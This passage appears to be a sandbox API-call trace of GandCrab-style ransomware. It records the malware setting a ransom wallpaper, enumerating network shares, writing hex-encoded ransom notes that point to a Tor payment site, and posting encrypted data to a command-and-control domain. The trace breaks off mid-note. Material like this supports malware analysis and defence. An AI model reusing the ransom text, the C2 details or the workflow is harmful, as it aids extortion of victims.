dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.580] GetUserNameW (in: lpBuffer=0x19f63c, pcbBuffer=0x19f848 | out: lpBuffer="CIiHmnxMn6Ps", pcbBuffer=0x19f848) returned 1 [0100.581] lstrcmpiW (lpString1="CIiHmnxMn6Ps", lpString2="SYSTEM") returned -1 [0100.581] wsprintfW (in: param_1=0x19ee3c, param_2="DEAR %s, " | out: param_1="DEAR CIiHmnxMn6Ps, ") returned 19 [0100.581] DrawTextW (in: hdc=0x47010631, lpchText="DEAR CIiHmnxMn6Ps, ", cchText=-1, lprc=0x19f9c4, format=0x11 | out: lpchText="DEAR CIiHmnxMn6Ps, ", lprc=0x19f9c4) returned 29 [0100.581] DrawTextA (in: hdc=0x47010631, lpchText="YOUR FILES ARE UNDER STRONG PROTECTION BY OUR SOFTWARE. IN ORDER TO RESTORE IT YOU MUST BUY DECRYPTOR", cchText=-1, lprc=0x19f9c4, format=0x11 | out: lpchText="YOUR FILES ARE UNDER STRONG PROTECTION BY OUR SOFTWARE. IN ORDER TO RESTORE IT YOU MUST BUY DECRYPTOR", lprc=0x19f9c4) returned 58 [0100.582] lstrlenW (lpString="TITWMVJL") returned 8 [0100.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TITWMVJL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.582] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1e40000 [0100.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TITWMVJL", cchWideChar=8, lpMultiByteStr=0x1e40000, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TITWMVJL", lpUsedDefaultChar=0x0) returned 8 [0100.582] lstrlenA (lpString="TITWMVJL") returned 8 [0100.582] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1e60000 [0100.583] wsprintfA (in: param_1=0x1e60000, param_2="For further steps read %s-DECRYPT.%s that is located in every encrypted folder" | out: param_1="For further steps read TITWMVJL-DECRYPT.txt that is located in every encrypted folder") returned 85 [0100.583] DrawTextA (in: hdc=0x47010631, lpchText="For further steps read TITWMVJL-DECRYPT.txt that is located in every encrypted folder", cchText=-1, lprc=0x19f9c4, format=0x11 | out: lpchText="For further steps read TITWMVJL-DECRYPT.txt that is located in every encrypted folder", lprc=0x19f9c4) returned 29 [0100.584] VirtualFree (lpAddress=0x1e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.584] VirtualFree (lpAddress=0x1e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.584] GetTickCount () returned 0x2d046 [0103.893] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x1e40000 [0103.893] GetTempPathW (in: nBufferLength=0x100, lpBuffer=0x1e40000 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0103.893] lstrcatW (in: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", lpString2="\\bxmeoengtf.bmp" | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp" [0103.893] GetObjectW (in: h=0x94050559, c=24, pv=0x19ede8 | out: pv=0x19ede8) returned 24 [0103.893] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x561fe0 [0103.905] GetDIBits (in: hdc=0xa0100d0, hbm=0x94050559, start=0x0, cLines=0x384, lpvBits=0x4290020, lpbmi=0x561fe0, usage=0x0 | out: lpvBits=0x4290020, lpbmi=0x561fe0) returned 900 [0103.941] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\bxmeoengtf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x370 [0103.941] WriteFile (in: hFile=0x370, lpBuffer=0x19ee00*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x19ee10, lpOverlapped=0x0 | out: lpBuffer=0x19ee00*, lpNumberOfBytesWritten=0x19ee10*=0xe, lpOverlapped=0x0) returned 1 [0103.942] WriteFile (in: hFile=0x370, lpBuffer=0x561fe0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x19ee10, lpOverlapped=0x0 | out: lpBuffer=0x561fe0*, lpNumberOfBytesWritten=0x19ee10*=0x28, lpOverlapped=0x0) returned 1 [0103.942] WriteFile (in: hFile=0x370, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x4f1a00, lpNumberOfBytesWritten=0x19ee10, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x19ee10*=0x4f1a00, lpOverlapped=0x0) returned 1 [0105.309] CloseHandle (hObject=0x370) returned 1 [0105.327] SelectObject (hdc=0x47010631, h=0x18a0048) returned 0x9c0a052b [0105.327] DeleteObject (ho=0x9c0a052b) returned 1 [0105.327] SelectObject (hdc=0x47010631, h=0x185000f) returned 0x94050559 [0105.327] DeleteObject (ho=0x94050559) returned 1 [0105.327] DeleteDC (hdc=0x47010631) returned 1 [0105.327] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0105.328] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x1e40000, fWinIni=0x3 | out: pvParam=0x1e40000) returned 1 [0106.728] VirtualFree (lpAddress=0x1e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0106.728] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407b32, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x370 [0106.729] GetTickCount () returned 0x2e852 [0106.729] wsprintfW (in: param_1=0x19eff8, param_2="http://%s" | out: param_1="http://www.kakaocorp.link") returned 25 [0106.729] lstrcpyW (in: lpString1=0x19d770, lpString2="static" | out: lpString1="static") returned="static" [0106.729] lstrcpyW (in: lpString1=0x19d970, lpString2="imgs" | out: lpString1="imgs") returned="imgs" [0106.729] lstrcpyW (in: lpString1=0x19db70, lpString2="am" | out: lpString1="am") returned="am" [0106.729] lstrcatW (in: lpString1="am", lpString2="me" | out: lpString1="amme") returned="amme" [0106.729] lstrcpyW (in: lpString1=0x19dd70, lpString2="bmp" | out: lpString1="bmp") returned="bmp" [0106.729] wsprintfW (in: param_1=0x19df70, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.kakaocorp.link/static/imgs/amme.bmp") returned 46 [0106.729] lstrlenW (lpString="http://www.kakaocorp.link/static/imgs/amme.bmp") returned 46 [0106.730] lstrcpyW (in: lpString1=0x19d4b4, lpString2="static/imgs/amme.bmp" | out: lpString1="static/imgs/amme.bmp") returned="static/imgs/amme.bmp" [0106.730] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0106.730] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0107.060] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.060] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0107.060] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.060] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.kakaocorp.link", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0107.060] wsprintfW (in: param_1=0x19c59c, param_2="/" | out: param_1="/") returned 1 [0107.060] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.060] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0107.061] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.061] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0107.283] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.284] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x19cd9c, lpdwBufferLength=0x19d19c, lpdwIndex=0x19d1a4*=0x0 | out: lpBuffer=0x19cd9c*, lpdwBufferLength=0x19d19c*=0x3, lpdwIndex=0x19d1a4*=0x0) returned 1 [0107.284] lstrcmpiA (lpString1="30x", lpString2="30x") returned 0 [0107.284] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.284] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0107.284] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.284] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0107.284] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.285] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0107.285] VirtualAlloc (lpAddress=0x0, dwSize=0x249, flAllocationType=0x3000, flProtect=0x4) returned 0x25b0000 [0107.285] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0107.285] lstrlenA (lpString="7ftDEgLb/ZS0lcmZbHM61KLJxQOpD54Kkw6Sbssgf3YAWOMCyp+KYBxxG2Dd9MPJEpD7AsmVgOC9RWfIRHQpQxGa1LPGzrESG+ggarGXo6bcGPMpY0uHIkmg28QUqhTsgkgYXVpiDcFwiXH/glKVWoVHKCPZMpv74CZ2O8Q3zWax0KIRC/ovEtvBmdlSspmHNvUFIKl0WYNaAyw0SK6bDLlF3yPqB5gmabF+Z/XMGd3sgD725J3/UwB7w9xEWL0y74Xq53tHRnKSMJ+Bl1Dzeiqo9FrdnMKZ719GSVfO+TAimLr7s4CuGAspCajqRTwVfPf20xBSUiDItLOJdNAFBnVqrMZoR+S3NLGYmdaR30fRP93yqPMwLOLjT6O6r1xW4eZxTzPJ1fbDL0900Pf6S0az7KAvoTfFp52GPDKx5ChBudroM1oO6iqVwum2qBlvZLwKrtMypS8E1fmlXzmZ7qd4BuwugWCwY0zVb5QfvdxGLSuj7biAwDPiqTOLKPGgj42YWKb++AlSvHuiz4EYEqBE6iNnANfhwNQLIEz1RkHKybuMKp1R1lQ/puQeezwEiXTECr7r") returned 584 [0107.285] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.285] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0107.286] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.286] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0107.287] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.287] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.kakaocorp.link", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0107.287] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0107.287] wsprintfW (in: param_1=0x25d0000, param_2="%s" | out: param_1="static/imgs/amme.bmp") returned 20 [0107.287] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.287] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="static/imgs/amme.bmp", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0107.287] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0107.287] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x25b0000*, dwOptionalLength=0x248 | out: lpOptional=0x25b0000*) returned 1 [0110.202] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0110.202] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0110.202] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0110.202] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0110.202] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.202] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.203] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x743e0000 [0110.203] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0110.203] RtlExitUserThread (Status=0x0) Thread: id = 2 os_tid = 0xe64 Thread: id = 3 os_tid = 0xe68 Thread: id = 4 os_tid = 0xc94 [0067.331] VirtualAlloc (lpAddress=0x0, dwSize=0x202, flAllocationType=0x3000, flProtect=0x4) returned 0x25a0000 [0067.331] GetComputerNameW (in: lpBuffer=0x25a0000, nSize=0x244ff7c | out: lpBuffer="LHNIWSJ", nSize=0x244ff7c) returned 1 [0067.331] VirtualAlloc (lpAddress=0x0, dwSize=0x1002, flAllocationType=0x3000, flProtect=0x4) returned 0x25b0000 [0067.332] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0067.428] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x244ff50 | out: lphEnum=0x244ff50*=0x4c6190) returned 0x0 [0067.428] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0067.428] WNetEnumResourceW (in: hEnum=0x4c6190, lpcCount=0x244ff58, lpBuffer=0x25b0000, lpBufferSize=0x244ff54 | out: lpcCount=0x244ff58, lpBuffer=0x25b0000, lpBufferSize=0x244ff54) returned 0x103 [0067.428] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0067.428] WNetCloseEnum (hEnum=0x4c6190) returned 0x0 [0067.428] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0067.429] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x244ff50 | out: lphEnum=0x244ff50*=0x4c9c78) returned 0x0 [0068.190] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0068.190] WNetEnumResourceW (in: hEnum=0x4c9c78, lpcCount=0x244ff58, lpBuffer=0x25b0000, lpBufferSize=0x244ff54 | out: lpcCount=0x244ff58, lpBuffer=0x25b0000, lpBufferSize=0x244ff54) returned 0x0 [0068.190] VirtualAlloc (lpAddress=0x0, dwSize=0x1002, flAllocationType=0x3000, flProtect=0x4) returned 0x2620000 [0068.190] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0068.190] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x25b0000, lphEnum=0x244ff24 | out: lphEnum=0x244ff24*=0x4c6490) returned 0x0 [0068.192] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0068.192] WNetEnumResourceW (in: hEnum=0x4c6490, lpcCount=0x244ff2c, lpBuffer=0x2620000, lpBufferSize=0x244ff28 | out: lpcCount=0x244ff2c, lpBuffer=0x2620000, lpBufferSize=0x244ff28) returned 0x103 [0068.192] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0068.192] WNetCloseEnum (hEnum=0x4c6490) returned 0x0 [0068.192] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.192] VirtualAlloc (lpAddress=0x0, dwSize=0x1002, flAllocationType=0x3000, flProtect=0x4) returned 0x2620000 [0068.192] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0068.193] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x25b0020, lphEnum=0x244ff24 | out: lphEnum=0x244ff24*=0x0) returned 0x4b8 [0082.059] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.059] VirtualAlloc (lpAddress=0x0, dwSize=0x1002, flAllocationType=0x3000, flProtect=0x4) returned 0x2620000 [0082.074] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0082.074] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x25b0040, lphEnum=0x244ff24 | out: lphEnum=0x244ff24*=0x0) returned 0x4c6 [0082.075] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.075] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0082.075] WNetEnumResourceW (in: hEnum=0x4c9c78, lpcCount=0x244ff58, lpBuffer=0x25b0000, lpBufferSize=0x244ff54 | out: lpcCount=0x244ff58, lpBuffer=0x25b0000, lpBufferSize=0x244ff54) returned 0x103 [0082.075] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74350000 [0082.075] WNetCloseEnum (hEnum=0x4c9c78) returned 0x0 [0082.075] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.075] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.076] VirtualFree (lpAddress=0x25a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.076] RtlExitUserThread (Status=0x0) Thread: id = 5 os_tid = 0xc90 [0067.434] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x25c0000 [0067.434] wsprintfW (in: param_1=0x25c0000, param_2="%S" | out: param_1="C:\\") returned 3 [0067.434] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.434] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0067.435] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.435] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0067.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.436] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0067.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.437] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0067.438] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.438] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.438] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\\\TITWMVJL-DECRYPT.txt") returned 24 [0067.438] CreateFileW (lpFileName="C:\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0067.440] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\